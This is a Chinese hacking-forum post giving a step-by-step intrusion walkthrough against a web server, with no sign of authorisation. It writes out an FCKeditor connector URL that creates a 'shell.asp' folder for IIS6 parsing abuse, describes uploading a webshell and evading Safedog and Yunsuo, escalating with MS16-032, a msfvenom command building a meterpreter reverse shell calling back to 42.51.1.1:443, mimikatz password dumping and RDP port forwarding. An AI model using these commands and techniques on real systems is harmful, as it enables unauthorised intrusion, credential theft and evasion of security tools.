中国网络渗透测试联盟

标题: 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器 [打印本页]

作者: admin    时间: 2018-10-20 20:31
标题: 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

: a! A+ V& O$ F$ F9 { + l" o F2 T3 b* R2 H& N5 f, z3 P& z. |$ }& Q$ Y& Q& r8 B8 ~+ H! m( g# f. g6 \6 K& @1 `9 J) w0 D4 i* }) R- ]) l, ~* M2 D$ h$ a/ L. Y4 s/ e0 P3 |# M
/ z8 V* g# I. W5 `

# h" g# T* V) N9 W8 A
$ e: P1 B) Z9 X+ u
一、 利用getwebshell
l6 @+ q4 e8 M& I% w3 @2 y6 |' S B
! ?$ t& k+ v* p3 N# L
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
& A. z) P! }9 S1 s5 L
, y+ a3 ]* E; A5 t$ I i 222.png
6 Q! W' R! [; N5 h9 o W G
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
8 s2 k' C; k1 p$ e" W P333.png
4 k# |6 S) i* K+ k7 S9 l) m [: f# D
下面我们构造一个asp目录,如: ' f% L4 g7 [8 E& e5 m8 L) T

/ _+ \( ]- K3 J

' O% @2 F5 t7 a; w! t w# E& ? http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 5 d' S. l7 l. \$ y2 k

, [! e; ?0 ]8 ?! C# \# T

0 P, h( J1 G0 o 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
+ P9 ^$ [+ A3 h( u
/ }! g/ B o B- f! r0 P( S
一、 绕过安全狗云锁提权并且加账号
0 X5 c, v) }1 I' ]444.png
# Q8 C& N2 s% C/ m- a
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
& p( L; [- {# W1 M- p! |* `
9 S7 e6 x- p. S# g# A: u# z
如图:
) V2 {( Z$ w% S8 T/ O. K 555.png
, U9 ?' ^' M( V4 G; V- O5 _
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
) K2 o' ]4 m% c7 H; J3 Q
7 _: `% i9 g0 g' Z6 Q* z) v
一、 利用metasploit
3 A0 _' s- [/ V9 i. b* w
c9 T% X* j3 P- r% n$ [+ j
首先用pentestbox生成一个64位的payload如下命令
% c; ]4 C# Y, X) O9 ?7 }2 \
, u4 R0 `% ^5 Q" I msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
2 p- d5 I6 d* c, ~. H
! K. N8 I, K1 |3 z- y( K4 `
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
/ \2 B1 N2 N( ^5 e* D# Z7 m6 H11.png
/ d5 k3 Y3 l' b L# {
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
/ f8 o6 t$ u* u 13.png
% z# d* F% t8 F- |: ~6 Z8 v" Y. b8 d
下面我们来做一个监听如下命令:
2 Y* q- L' t# E" v) K2 [+ z X
6 l, h B$ N# X4 G, j _, {7 [ portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
6 y. y7 F0 Z: H, ~* [# D18.png
Z: K, p( V$ s6 N! v5 p

9 @4 h9 b" Y& C! i" { A; `
& f2 n3 M% l3 Y. s9 U3 X

% C- a$ z* U L! e$ |) p" d/ j; u

* [. y8 \0 s$ @ X4 ^8 c; o6 k
5 F- K$ a2 A' P4 `4 V7 `6 M) q5 k" m
8 i" B. T( Z- x! z0 q% ]
3 v# R# f+ F) n) z- D) J/ l

9 p0 h$ K$ Y: d7 o0 H% a/ b
+ N& {' @% Y6 J) g" b A4 U7 @" {( X' o; y6 k

( X- i' u$ Y' s. X! F8 o# @
$ Q; L& u8 r5 ~3 C8 t) J, z" b


作者: 匿名    时间: 2021-11-20 23:30
图片怎么都没了




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2